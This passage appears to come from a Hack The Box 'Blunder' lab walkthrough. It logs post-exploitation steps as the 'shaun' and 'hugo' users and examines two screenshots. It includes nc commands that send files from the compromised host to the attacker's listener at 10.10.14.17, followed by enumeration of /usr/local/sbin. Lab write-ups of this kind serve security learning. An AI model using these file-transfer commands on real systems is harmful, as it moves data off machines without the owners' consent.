Screenshots


shaun@blunder:~$ ll Pictures
total 624K
4.0K drwxr-xr-x  2 shaun shaun 4.0K Nov 28  2019  .
4.0K drwxr-xr-x 16 shaun shaun 4.0K Jul  6  2021  ..
172K -rw-r--r--  1 shaun shaun 171K Nov 28  2019 'Screenshot from 2019-11-28 14-02-13.png'
444K -rw-r--r--  1 shaun shaun 441K Nov 28  2019 'Screenshot from 2019-11-28 13-17-29.png'

Upon gaining lateral movement to the shaun user, I came across 2 screenshots in the ~/Pictures directory

shaun@blunder:~/Pictures$ nc 10.10.14.17 2222 < 'Screenshot from 2019-11-28 13-17-29.png'
shaun@blunder:~/Pictures$ nc 10.10.14.17 2222 < 'Screenshot from 2019-11-28 14-02-13.png'
 
┌──(kali㉿kali)-[~/…/htb/labs/blunder/screenshots]
└─$ nnc 2222 > 'Screenshot from 2019-11-28 13-17-29.png'
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 56024
┌──(kali㉿kali)-[~/…/htb/labs/blunder/screenshots]
└─$ nnc 2222 > 'Screenshot from 2019-11-28 14-02-13.png'
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 56028

Transfer complete

Screenshot from 2019-11-28 13-17-29.png


┌──(kali㉿kali)-[~/…/htb/labs/blunder/screenshots]
└─$ open Screenshot\ from\ 2019-11-28\ 13-17-29.png

This screenshot appears to demonstrate an exploit PoC located at the /usr/local/sbin directory as the hugo user

hugo@blunder:~$ ll /usr/local/sbin
total 792K
4.0K drwxr-xr-x  2 root root 4.0K Apr 28  2020 .
784K -rwxr-xr-x  1 root root 782K Apr 27  2020 visudo
4.0K drwxr-xr-x 11 root root 4.0K Apr 27  2020 ..

The only thing present in the /usr/local/sbin directory is visudo

hugo@blunder:~$ /usr/local/sbin/visudo
visudo: /etc/sudoers: Permission denied

Permission denied

Screenshot from 2019-11-28 14-02-13.png


┌──(kali㉿kali)-[~/…/htb/labs/blunder/screenshots]
└─$ open Screenshot\ from\ 2019-11-28\ 14-02-13.png